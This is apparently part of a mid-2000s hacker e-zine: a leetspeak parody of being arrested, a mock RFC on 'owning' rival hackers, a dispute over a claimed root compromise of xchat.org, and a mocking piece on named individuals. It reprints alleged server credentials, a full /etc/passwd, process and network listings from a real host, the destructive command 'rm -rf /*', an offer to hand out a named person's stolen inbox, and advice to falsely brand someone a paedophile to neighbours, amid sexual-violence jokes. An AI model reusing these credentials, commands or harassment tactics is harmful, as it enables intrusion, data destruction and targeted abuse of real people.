wh3n s3v3rAL 0veRweIGht dUnK1nG d0ugHnuT l0v3rZ ent3r YouR h0me! ST0p! d0 N0t r34CH f0r Th3 sh0TguN b3n34tH y0uR p1LloW(k3pT f0R th3 viZiT to Bx'Z h0me), y0U 4r3 Ab0uT t0 b3 GR()unD3d. bE1nG gr0unDed SuCkz, 3Xc3pt f0R th3 r1d3 In Th3 c00L truCk wiTh fl4ShiNg lIghTz!!!! iF y0U th1nK y0U m1gHt b3 GroUnd3d h3r3 Ar3 soM tIngZ y0u ShuLd D0 f1rZt. 1. H1d3 4 C3lLph0n3 In y0uR aZZ - d0 N0t w0RRy aB0uT th3 C3lLphone In y0Ur anuZ m4kiNg noize, s3t It t0 v1b3r4t3 4nd H4v3 w4RM fuzZy f3eLiNg in P4Ntz inSt34D! 2. 3nCryPT 4Ll 0DAyZ wiTh XoR! 3. t4K3 y0Ur h4RdDiZk 0Ut 0F c0mPut4h 4Nd wr4p iT uP aZ XmAz GiFt! P3rf3ct DiSgu1ze! Wh3N y0U g0To FbI 0Ff1c3 HQ (B4tManZ C4v3), t4k3 0Ff y0Ur cl0th3z t0 Sh0w FBi y0U h4v3 N0 w34pOnz 0r b4b0'Z drUgZ st4zH3d 0N y0U (h0p3 c3Llph0n3 d03z n0t r1ng aZ Ag3nT t0Uch1nG y0Ur BUtT m1Ght w0nd3r whY d4 34rth M0v3d!!!).Wh3N pOl1C3 T0uCh U uP t3lL th3m Th3y ar3 P3rv3rtZ! AnD t0 St0p GropIng y0u! D3m4nD a LaWy3r AzAp! 4ft3R y0U 4r3 kn1Ck3d - C0pZ w1lL t3lL y0u 4nYThiNg y0U s4Y c4n & W1LL b3 Uz3d 4g4iNzt y0U, s0 c0Nf3Zz t0 3v3rY muRd3r 4nD r4p3 iN th4 aRea! BuT d0 n0t S1Gn 4nY st4t3m3nT, 0nLy int3rViEw c4n B3 uZeD iN c0Urt! s3e h0W c0Pz li3 t0 YoU?!? Li3 b4ck, t3Ll th3m Y0u h4V3 h4ck3D th3 t3Lc0 oR b3tt3r Y0u w0rK ther3 4z C4r3t4k3R aNd 0p3N th3 C0 Up iN th3 m0rN1nGz... ThiZ w1Ll m4k3 Th3m pArAn0iD!Y0u W1Ll th3n B3 puT in 4 C3Ll - y0U c4n c4Ll iT ~! S0 r3m3mb3r t0 M4st3rBa1t3 th3rE 4nD puT jiZm 0n Sh3eTz anD fl00r. 3tcH h0no 1nt0 Th3 w4Ll. d0 n0t D0 3xc3rZie3z, s1T in m3Dit4TioN p0ZiTion. iN y0Ur ph0n3c4Ll t0 l4Wy3r t3Ll th3m Y0u n3eD m0r3 c0Ff3e 4Nd t34. 3aT th3 fr33 f00D y0u G3t. N0w y0U g3t T0 m4k3 Ph0n3 c4lL t0 n0t1fY s0m1 0F y0ur Arr3zT s0 c4lL piZzahUt 4nD 0rd3r 4 PizZa! aFt3r Th3 CoPz s34Rch3d y0uR ~ f0R zer0D4y w0RlD D0m1n4t1oN pl4nZ, 4nD ciSc0 SrC! th3y w1lL w4Nt t0 Qu3ztIon y0u. In int3rvi3w, d0 NoT sp34k. p0l1c3 l1k3 t0 h34r Y0u Br4g, th3 FeDz anD fuZzy BunNiz w4nT To l0cK y0u uP in JisM st41n3d Sh3eTz anD piZz st4in3d fl0oR!s0 D0Nt t4lK t0 Th3m!t3ll th3m y0u 4r3 4l Q43d4 4nd w1ll f0r3v3r curs3 th31r gr4v3z 1f 1npr1s10n3d!0n th3 4dV1Ze 0F y0Ur 3xc3ll3Nt h0no buDDiEz. h0tglu3 y0ur m0uth shut t0 pr3v3nt th3m fr0m tr1ck1ng y0u 1nt0 t4lk1ng r3m3mb3r iF y0U n4rQ 0n h4ck3rZ 0R fr13nDz y0U wiLl b3 B34t uP 4nD r4p3d, Sl0Ck3d 4nD C0ck3d - w3 PuT h4rDiZk in 0uR Sl0Ck t0 b34t uP sn1tCh3z. g0 b4Ck t0 C3lL 4nD pl4Y tiC-t4c-t03 wiTh y0Ur im4g3nary fr13nD, t4lk T0 y0Urs3lf 4nD th3n Sh1T th3 ph0n3 oUt y0uR aZz, Us3 iT t0 r34D buGtr4Q t0 m4k3 sUr3 u d0Nt mIzZ 28D4y W4r3z. st4rt nucl34r w4r by w1stl1ng t0n3z 1nt0 t3l3ph0n3. th1s w1ll m4k3 th0se f3dz ph33r y0u. th3 F3Dz f34R y0U 4L0t b3CuzE h0W quIckLy y0U s0Lv3 ruBikZ cub3z! s0 th3y WiLl l3t y0U 0uT t0 st0P wW3 br34KiNg OuT! l4unch 4 nucl34r w4rh34d 0n th3 pr1s0n by w1stl1ng t0n3z 1nt0 t3l3ph0n3 wh3N y0U l34V3. C0oL sh1T t0 D0 iN y0Ur c3Ll. 1. 3tCh sh3lLc0d3 iNt0 th3 w4Ll s0 th3 M4tRiX w1Ll l3T y0U dr0P t0 r00T 4nD w4Lk thR0uGh w4Llz. 2. thR0W TuRDz 0Ut 0F y0Ur c3Ll d0oR. 3. m4k3 A piZz,jiZm 4nD sh1t r1v3r. 4. T0uCh y0uRs3Lf. 5. Sh1t 0uT y0uR C3lLph0n3,l4pTop, 4nD h4Ck sTuPh. 6. Fl1rT wiTh cUt3 cl34N3rz. 7. 4Zk f0R dRuGz C0unC1lLinG. 8. li3 9. t3lL th3 g4Ngzt3rz iN th3 C3llZ y0u 4r3 J3Zuz 10. tHr0w fl4m1nG t0il3t R0lLz 4t g4ngst3rz. 11. St4rT A ri0T. n0W y0u 4r3 fr33 fr0m Gr0uNdinG th4nKz t0 h0no(4nD A juMP 0uT d4 TCP w1nD0w!!!!) y0U c4n G0 b4Ck to wr1TiNg 0Day w0Rmz 4nD DDoSiNG BX!!!! 12.txt-~-~-~ H0NO INTERNET PROGRAM PROTOCOL SPECIFICATION RFC: 31337 OWNING PEOPLE PROTOCOL H0NO INTERNET PROGRAM PROTOCOL SPECIFICATION December 2004 prepared for Defense Advanced Research Projects Agency Lamers on #darknet && #blackhat && IRC by core h0no staff PREFACE .......................................................... 3 1. INTRODUCTION ..................................................... 1 1.1 Motivation .................................................... 3 1.2 Scope ......................................................... 3 2. OWNING PROTOCOL................................................... 7 2.1 Defining Hacking a System ..................................... 3 2.2 Model of Operation ............................................ 1 2.3 Actual owning technique ....................................... 3 2.4 Cleaning up ................................................... 3 3. CLOSING STATEMENT.................................................. 7 3.1 Telling the parents ........................................... 3 3.2 Bragging rights ............................................... 1 PREFACE This document describes the H0NO Standard Owning People Protocol. It was implemented by Dr. Zeus Procaeus & the spirit of my dead cat. SnowBall II Editor RFC: 31337 Replaces: RFC * OWNING PEOPLE PROTOCOL DARPA INTERNET PROGRAM PROTOCOL SPECIFICATION 1. INTRODUCTION The Owning People Protocol (OPP) is intended for use as a highly reliable hacker-to-hacker attacking protocol between computer hackers in a packet- switched alternate reality. 1.1. Motivation Computer communication systems are playing an increasingly important role in military, government and child porn trading environments. This document focuses the attention on you, the hacker. So heres your motivation, your 19 years old, I raped your sister, fucked your mother, read your email and you guessed it - wrote your root password in blackmarker on the wall. Motivated enough? good. 1.2 Scope We recommend any with laser sights and night vision, perfect for picking off whitehats at night. 2. OWNING PROTOCOL What follows is an indepth discussion on OOP, get out your Sybex course material and begin studying up - this could save your life one day. 2.1 Defining Hacking a System Hackers have debated what is a hacker for many years, but what is actually hacking a system? Hacking the system is done by h0no with a magic wand, which was given to us by harry potter. So fucking fear us, but you can be classed as having read write or execute on some level or another, perhaps you maybe on the lowest level (with bx and dvdman) and actually be a small ascii penis. The next section shows this in a cute ascii diagram from this foxy bitch down at the DoD (We fucked her for passwords). 2.2 Model of operation +---------------------+ |srwx h0no eliteness | +---------------------+ |????-rwx------ root | +---------------------+ |????----rwx--- group | +---------------------+ | 8=========> you | +---------------------+ As you can see, at the top of the diagram is h0no, just below that is root, root is actually pretty cool and to own someone you gotta be root, everywhere they have an account and at their homes - you will be root.Beneath that is group, at this level you should have an account on their box and finally at the bottom is you, an ascii penis which looks almost like dvdman if you stand it on its side. 2.3 Actual Owning technique Actual owning technique varies, h0no just wave our wands and we instantly obtain the h0no srwx flags to all the user's life and personal data. It is a cool wand that only dark wizards can get if they bully harry potter at school. As you are probably whitehat or cop you only know how it feels to be bullied at school. So to help you understand the wand, here is a datagram from our wang. OOP Header Format 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Victims ICQ No | Victims AIM Name | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Victims IRC whois and channels | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Reserved for more info | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | | |O|W|N|E|D|!| | | Quotes| Pictures |!|O|W|N|E|D| Data of family | | | |X|X|X|X|X|X| | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | h0no commands | Nakid pictures | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | All the victims warez | Padding | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Izzy Wizzy lets get busy | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 2.4 Cleaning up Now that you have finished waving your wand and have complete control of the persons systems and life, we need to clean up. To do this type the following command on all systems. "rm -rf /*" 3. CLOSING STATEMENT 3.1 Telling the parents After you have followed OOP you will have one very distressed kiddy to deal with, at this point we recommend contacting the genetic ancestors of the creature. H0no likes to do this personally, over the phone. Also it is wise to flyer all neighbouring houses with a leaflet saying that the hacker is a convicted paedophile. A typical phone call to the parents of such an hacker goes like this. h0no "YOUR SON JON PLAYS WITH HIS PENIS ON THE INTERNET FOR MONEY!" MOM "OMG HE DOES WHAT NOW?!?" 3.2 Bragging rights This is the most important part of the OOP, you need to boast about your conquests to all the other hackers in the world so everyone who hears your name trembles in fear and does not want to play around with you. Because your a psycho. Who will call their Mom's. We recommend boasting in any of the channels shown in dvdman's whois for maximum attention. 13.txt-~-~-~ boobys's's is liarz! http://www.boobys.org is a nice site. They try hard to own lamerz with social enigneering shit. But after careful review of their logs we have uncovered quite a goof. Atleast when h0no fakes logs, we do it right! "The information and logs below can obviously be faked. Actually everything on this website COULD be faked but it is NOT. People will always deny they got hacked. Its not something we as human beings like to admit, defeat." - http://www.boobys.org/files/xmas.html the first part of this paragraph is hogwash. The end bit though, is very true. h0no would like to ask boobys to please announce an applogy letter to their deticated followship of netric ircops and dtor tutorial readerz admitting that they have decieved them. The following is taken from http://www.boobys.org/files/xchat.html, which we mirror here incase of any tappering by the web admin. -~-~-~ XCHAT.ORG As itz be decembre and almost de jesus's burf day, we thort that we wud do sum good deeds so dat santa puts us on the good boyz list, so we get wicked cool prezents! Anywayz, after da recent phpBB exploiteZ dat waz releaseD the whole of da damned interweb was being "owned" everywhere. We satz down on R ass and watched stupid fuckWits ./ der way in2 some well RESPECTd interweb pages! Az you all are awares we do not usualluy tarGET the script kiddies of da interweb, dis is because mainly they R the future of 2moro. A big muver fucking BUT..we do NOT like the stupid ./ our shit and making biggg messes wit open backdoors and bind shells. BOOBYS TO DA RESCUE: MySQL user: xchat MySQL pass: kW3rk User: xchat Pass: KW3rk User: Website Pass: ch4tjunk3y5.n7 # id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy) # uname -a Linux nl 2.4.25 #1 Tue Apr 13 15:05:13 CEST 2004 i586 GNU/Linux # ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.3 1492 416 ? S Apr13 0:33 init [2] root 2 0.0 0.0 0 0 ? S Apr13 0:34 [keventd] root 3 0.0 0.0 0 0 ? SN Apr13 0:49 [ksoftirqd_CPU0] root 4 0.0 0.0 0 0 ? S Apr13 90:38 [kswapd] root 5 0.0 0.0 0 0 ? S Apr13 0:00 [bdflush] root 6 0.0 0.0 0 0 ? S Apr13 6:24 [kupdated] root 7 0.0 0.0 0 0 ? S Apr13 103:38 [kjournald] root 117 0.0 0.0 0 0 ? S Apr13 1:00 [kjournald] root 276 0.0 0.2 6116 248 ? Ss Apr13 2:31 /usr/sbin/pdns_server --daemon --guardian=yes root 277 0.0 0.2 6116 248 ? S Apr13 0:27 /usr/sbin/pdns_server --daemon --guardian=yes root 278 0.0 0.2 6116 248 ? S Apr13 0:00 /usr/sbin/pdns_server --daemon --guardian=yes daemon 624 0.0 0.0 1672 24 ? Ss Apr13 0:02 /usr/sbin/atd root 636 0.0 0.0 1488 4 tty4 Ss+ Apr13 0:00 /sbin/getty 38400 tty4 root 637 0.0 0.0 1488 4 tty5 Ss+ Apr13 0:00 /sbin/getty 38400 tty5 root 638 0.0 0.0 1488 4 tty6 Ss+ Apr13 0:00 /sbin/getty 38400 tty6 root 782 0.0 0.0 1488 4 tty2 Ss+ Apr13 0:00 /sbin/getty 38400 tty2 root 998 0.0 0.0 1488 4 tty3 Ss+ Apr13 0:00 /sbin/getty 38400 tty3 root 1430 0.0 0.0 1488 4 tty1 Ss+ Apr13 0:00 /sbin/getty 38400 tty1 dividian 8812 0.0 0.6 4504 860 ? Ss Apr15 2:55 SCREEN dividian 8813 0.0 0.0 2608 4 pts/5 Ss Apr15 0:01 /bin/bash dividian 10546 0.0 0.0 2612 4 pts/6 Ss May07 0:00 /bin/bash clamav 10250 0.0 0.0 4608 108 ? Ss May23 0:06 /usr/sbin/clamav-milter --max-children=2 -olq --pidfile /var/run/clamav/clamav-milter.pid local:/var/run/clamav/clamav-milter.ctl clamav 10251 0.0 0.0 4608 108 ? S May23 0:19 /usr/sbin/clamav-milter --max-children=2 -olq --pidfile /var/run/clamav/clamav-milter.pid local:/var/run/clamav/clamav-milter.ctl clamav 10252 0.0 0.0 4608 108 ? S May23 0:00 /usr/sbin/clamav-milter --max-children=2 -olq --pidfile /var/run/clamav/clamav-milter.pid local:/var/run/clamav/clamav-milter.ctl nic 4387 0.0 0.2 3632 272 ? Ss May30 2:31 SCREEN BitchX nl.chatjunkies.org nic 4388 0.0 0.9 3968 1180 pts/2 Ss+ May30 8:56 BitchX nl.chatjunkies.org dividian 16187 0.0 1.2 8112 1508 pts/6 S+ Jul26 17:46 irssi dividian 526 0.0 0.0 2612 40 pts/3 Ss+ Aug27 0:00 /bin/bash dividian 3473 0.0 1.0 8104 1360 pts/5 S+ Aug31 2:28 irssi hybrid 6844 0.0 1.7 8436 2176 ? Ss Aug31 10:59 ./bin/ircd nic 31115 0.0 1.1 3748 1468 ? S Sep02 18:10 ./eggdrop eggdrop.conf root 13908 0.0 0.1 1752 212 ? Ss Oct04 0:16 /usr/sbin/cron root 17554 0.0 0.1 2528 144 ? S Oct04 0:00 /usr/sbin/inetutils-inetd root 31315 0.0 0.0 2876 112 ? Ss Oct04 0:05 /usr/sbin/dovecot root 31316 0.0 0.0 5980 120 ? S Oct04 0:04 dovecot-auth hybrid 11993 0.0 1.9 11496 2408 ? Ss Oct09 0:00 ./hybserv hybrid 11994 0.0 1.9 11496 2408 ? S Oct09 0:00 ./hybserv hybrid 11995 0.0 1.9 11496 2408 ? S Oct09 0:00 ./hybserv hybrid 11996 0.0 1.9 11496 2408 ? S Oct09 9:41 ./hybserv hybrid 11997 0.0 1.9 11496 2408 ? S Oct09 1:14 ./hybserv hybrid 12184 0.0 0.3 1548 392 ? S Oct09 0:50 ./bopm root 22936 0.0 0.8 7320 996 ? Ss Nov04 1:13 sendmail: MTA: accepting connections root 22988 0.0 0.6 5892 764 ? Ss Nov04 0:02 /usr/sbin/spamass-milter -P /var/run/spamass.pid -f -p /var/run/sendmail/spamass.sock -r 5 root 22990 0.0 0.6 5892 764 ? S Nov04 0:05 /usr/sbin/spamass-milter -P /var/run/spamass.pid -f -p /var/run/sendmail/spamass.sock -r 5 root 22991 0.0 0.6 5892 764 ? S Nov04 0:00 /usr/sbin/spamass-milter -P /var/run/spamass.pid -f -p /var/run/sendmail/spamass.sock -r 5 root 23291 0.0 0.4 3316 512 ? Ss Nov04 0:01 /usr/sbin/sshd root 24274 0.0 0.1 2340 236 ? S Nov04 0:00 /bin/sh /usr/bin/mysqld_safe mysql 24307 0.0 2.8 45992 3528 ? S Nov04 0:56 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock root 24308 0.0 0.1 1480 220 ? S Nov04 0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld mysql 24309 0.0 2.8 45992 3528 ? S Nov04 1:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock mysql 24310 0.0 2.8 45992 3528 ? S Nov04 0:05 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock mysql 24311 0.0 2.8 45992 3528 ? S Nov04 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock root 24312 0.0 1.1 23340 1444 ? S Nov04 0:00 /usr/sbin/pdns_server-instance --daemon --guardian=yes root 24333 0.0 1.1 23340 1444 ? S Nov04 0:00 /usr/sbin/pdns_server-instance --daemon --guardian=yes root 24334 0.0 1.1 23340 1444 ? S Nov04 0:00 /usr/sbin/pdns_server-instance --daemon --guardian=yes root 24335 0.0 1.1 23340 1444 ? S Nov04 0:24 /usr/sbin/pdns_server-instance --daemon --guardian=yes mysql 24336 0.0 2.8 45992 3528 ? S Nov04 5:08 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock root 24337 0.0 1.1 23340 1444 ? S Nov04 0:00 /usr/sbin/pdns_server-instance --daemon --guardian=yes root 24338 0.0 1.1 23340 1444 ? S Nov04 1:01 /usr/sbin/pdns_server-instance --daemon --guardian=yes mysql 24339 0.0 2.8 45992 3528 ? S Nov04 1:39 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock root 24340 0.0 1.1 23340 1444 ? S Nov04 1:00 /usr/sbin/pdns_server-instance --daemon --guardian=yes mysql 24341 0.0 2.8 45992 3528 ? S Nov04 1:43 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock root 24342 0.0 1.1 23340 1444 ? S Nov04 0:59 /usr/sbin/pdns_server-instance --daemon --guardian=yes mysql 24343 0.0 2.8 45992 3528 ? S Nov04 1:43 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock root 24344 0.0 1.1 23340 1444 ? S Nov04 0:20 /usr/sbin/pdns_server-instance --daemon --guardian=yes root 25162 0.0 0.4 27980 500 ? Ss Nov04 0:04 /usr/sbin/spamd --create-prefs --max-children 5 --helper-home-dir -d --pidfile=/var/run/spamd.pid dovecot 5260 0.0 0.4 2872 556 ? S Nov10 0:00 imap-login clamav 10626 0.0 0.5 4216 628 ? Ss Nov10 0:01 /usr/bin/freshclam -d --quiet -p /var/run/clamav/freshclam.pid clamav 10940 0.0 0.4 13896 596 ? Ss Nov10 1:28 /usr/sbin/clamd clamav 10962 0.0 0.4 13896 596 ? S Nov10 0:00 /usr/sbin/clamd clamav 10964 0.0 0.5 6276 728 ? Ss Nov10 0:01 /usr/sbin/clamav-milter --max-children=2 -olq --pidfile /var/run/clamav/clamav-milter.pid local:/var/run/clamav/clamav-milter.ctl clamav 10965 0.0 0.5 6276 728 ? S Nov10 0:03 /usr/sbin/clamav-milter --max-children=2 -olq --pidfile /var/run/clamav/clamav-milter.pid local:/var/run/clamav/clamav-milter.ctl clamav 10966 0.0 0.5 6276 728 ? S Nov10 0:00 /usr/sbin/clamav-milter --max-children=2 -olq --pidfile /var/run/clamav/clamav-milter.pid local:/var/run/clamav/clamav-milter.ctl root 10996 0.0 0.3 2040 400 ? Ss Nov10 0:00 /sbin/klogd root 11045 0.0 0.5 2240 708 ? Ss Nov10 1:33 /sbin/syslogd root 12328 0.0 0.8 11028 1044 ? S Nov10 0:14 /usr/sbin/apache nobody 12385 0.0 0.6 4632 812 ? Ss Nov10 0:00 proftpd: (accepting connections) hybrid 12696 0.0 0.5 3560 660 ? S Nov10 0:35 -slink 111 111 113 113 12 kenny 13110 0.2 4.0 6960 4956 ? S Nov15 28:49 /home/kenny/eggdrop/eggdrop ./kenny.conf nic 28843 0.0 0.6 3048 808 ? S Nov16 1:00 ./services hybrid 27260 0.0 0.6 3560 808 ? S Nov18 0:11 -slink 47 47 64 64 34 root 9959 0.0 0.4 6076 572 ? Ss Nov20 0:00 sshd: pcgod [priv] pcgod 9961 0.0 0.4 6080 592 ? S Nov20 0:00 sshd: pcgod@pts/0 pcgod 9962 0.0 0.3 2632 472 pts/0 Ss Nov20 0:00 -bash pcgod 10121 0.0 0.7 5120 964 pts/0 S+ Nov20 0:02 mutt root 23783 0.0 4.7 33252 5860 ? S Nov20 3:11 spamd child root 24977 0.0 2.7 30936 3404 ? S Nov20 3:07 spamd child root 25287 0.0 13.8 30332 17132 ? S Nov20 3:06 spamd child root 27237 0.0 1.9 33376 2412 ? S Nov20 3:08 spamd child root 27836 0.0 15.7 32932 19500 ? S Nov20 3:07 spamd child hybrid 7440 0.0 0.6 3560 808 ? S Nov21 0:05 -slink 74 74 77 77 65 hybrid 2242 0.0 0.6 3588 760 ? S 03:35 0:00 -slink 45 45 52 52 37 dovecot 18626 0.0 0.7 2864 908 ? S 14:37 0:00 pop3-login www-data 26760 0.1 2.7 12488 3344 ? S 18:38 0:05 /usr/sbin/apache root 26842 0.0 0.8 6072 1052 ? Ss 18:40 0:00 sshd: dividian [priv] dividian 26875 0.0 1.0 6080 1272 ? S 18:41 0:00 sshd: dividian@pts/4 dividian 26876 0.0 0.8 2632 1020 pts/4 Ss 18:41 0:00 -bash dividian 26887 0.0 0.5 2492 676 pts/4 S+ 18:41 0:00 screen -r dovecot 26899 0.0 0.8 2872 1048 ? S 18:41 0:00 imap-login dovecot 26900 0.0 0.8 2872 1048 ? S 18:41 0:00 imap-login dovecot 26901 0.0 0.8 2864 1048 ? S 18:41 0:00 pop3-login dovecot 26902 0.0 0.8 2864 1048 ? S 18:41 0:00 pop3-login www-data 27194 0.3 4.1 12648 5164 ? S 18:51 0:10 /usr/sbin/apache www-data 27300 0.1 4.1 12664 5136 ? S 18:56 0:04 /usr/sbin/apache www-data 27410 0.1 4.1 12656 5116 ? S 19:00 0:02 /usr/sbin/apache www-data 28898 1.7 4.0 12616 5008 ? S 19:44 0:00 /usr/sbin/apache www-data 28925 0.0 0.6 2476 836 ? R 19:44 0:00 ps aux # ifconfig eth0 Link encap:Ethernet HWaddr 00:10:4B:88:A2:20 inet addr:213.197.30.23 Bcast:213.197.30.255 Mask:255.255.255.0 inet6 addr: 2001:838:2:1::6667:1/64 Scope:Global inet6 addr: fe80::210:4bff:fe88:a220/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1522546391 errors:0 dropped:0 overruns:88528 frame:0 TX packets:790678316 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:3280880733 (3.0 GiB) TX bytes:1203610668 (1.1 GiB) Interrupt:11 Base address:0xec00 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:16583137 errors:0 dropped:0 overruns:0 frame:0 TX packets:16583137 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:1662947497 (1.5 GiB) TX bytes:1662947497 (1.5 GiB) # cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh majordom:x:30:31:Majordomo:/usr/lib/majordomo:/bin/sh postgres:x:31:32:postgres:/var/lib/postgres:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh msql:x:36:36:Mini SQL Database Manager:/var/lib/msql:/bin/sh operator:x:37:37:Operator:/var:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats/gnats-db:/bin/sh identd:x:100:65534::/var/run/identd:/bin/false telnetd:x:101:101::/usr/lib/telnetd:/bin/false andabata:x:1000:1000:Kees Guequierre,,,:/home/andabata:/bin/bash ircd:x:1001:1001:ChatJunkies,,,:/home/ircd:/bin/bash hybrid:x:1002:1002:Hybrid IRCD,,,:/home/hybrid:/bin/bash xchat:x:1007:1007:Peter Zelezny,,,:/home/xchat:/bin/bash nobody:x:65534:65534:nobody:/nonexistent:/bin/sh kenny:x:1008:1008:Kenny,,,:/home/kenny:/bin/bash sshd:x:102:65534::/var/run/sshd:/bin/false bind:x:103:1010::/var/cache/bind:/bin/false mxr:x:1011:1011:mxr,,,:/home/mxr:/bin/bash muske:x:1012:1012:muske,,,:/home/muske:/bin/bash pcgod:x:1003:1003:pcgod,,,:/home/pcgod:/bin/bash website:x:1004:1004:Chatjunkies.org Website,,,:/home/website:/bin/bash mysql:x:104:103:MySQL Server:/var/lib/mysql:/bin/false dividian:x:1006:1006:D,,,:/home/dividian:/bin/bash smmsp:x:105:104:Mail Submission Program,,,:/var/lib/sendmail:/bin/false nic:x:1005:1005:nic,,,:/home/nic:/bin/bash ftp:x:107:65534::/home/ftp:/bin/false crysanna:x:1013:1013:Crysanna,,,:/home/crysanna:/bin/bash dovecot:x:106:106:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false clamav:x:108:108::/var/lib/clamav:/bin/false zed:x:1014:1014:zed,,,:/home/zed:/bin/bash forum:x:1015:1015:,,,:/home/forum:/bin/bash smmta:x:109:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false popa3d:x:110:109::/var/lib/popa3d:/bin/false chaos:x:1016:1016:DSC22,,,:/home/chaos:/bin/bash blah blah blah, boring shitz... -~-~-~ I was pretty fucking physed at the chance of an xchat backdooring only to believe that they pussed out. When the truth is that they never rooted xchat.org. It's pretty easy to see from the logs why. # id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy) they claim uid=0, a technique founded by zone-h forum admins. Give proper credit. Then they issue ps aux from what looks to be root shell... but WTF is this? www-data 27194 0.3 4.1 12648 5164 ? S 18:51 0:10 /usr/sbin/apache www-data 27300 0.1 4.1 12664 5136 ? S 18:56 0:04 /usr/sbin/apache www-data 27410 0.1 4.1 12656 5116 ? S 19:00 0:02 /usr/sbin/apache www-data 28898 1.7 4.0 12616 5008 ? S 19:44 0:00 /usr/sbin/apache www-data 28925 0.0 0.6 2476 836 ? R 19:44 0:00 ps aux looks like processes spawned by their phpbb exploit, and of course one of them is the ps aux they claimed to have executed as uid=0. Let's look at the uid of www-data. www-data:x:33:33:www-data:/var/www:/bin/sh yea.. I didn't think it'd be 0. Hopefully boobys will publish a well written appology, or atleast come up with a better excuse than "our 0day shell masks processes as ran by www-data to like fool adminz" boobys, you need to own more. and rm more. you should of rm'd fallenroot. 14.txt-~-~-~ Morning_wood goez limp h0no often sitz around & wonders what is going on in the mindz of these fucked up 12 year oldz. The onez who play quake all day and edit .bat filez to prove their skillz (shoutz to tal0n!). This is an example of one of those groupz. Only this group is made up of full grown adultz. We first brought on atomix. *He's owned to fuck and baq. Even his family hatez him. Next, we went over illwill. *All his warez are oldwarez. Now they are mywarez. And finally morning_wood. *Here's a few mailz from his morningwood@thepub.co.za. yea, he knowz he'z owned. Anyone who wishes for his entire inbox and sent messages please leave a message on the zone-h forum, and a h0no member will surely deliver the goodz. As a spechial deal for eeye employees we will throw in morning_wood's inbox from illmob.org aswell. True group ownage. we love it. -~-~-~ From: "Mourning Woode" Subject: Re: Ifcam96 Exploit Date: Mon, 24 Mar 2003 09:08:39 +0200 To: "Nick Jacobsen" Thank you for you intrest in the Ifriends vunerability I discovered. First things first... I am not giving the full exploit 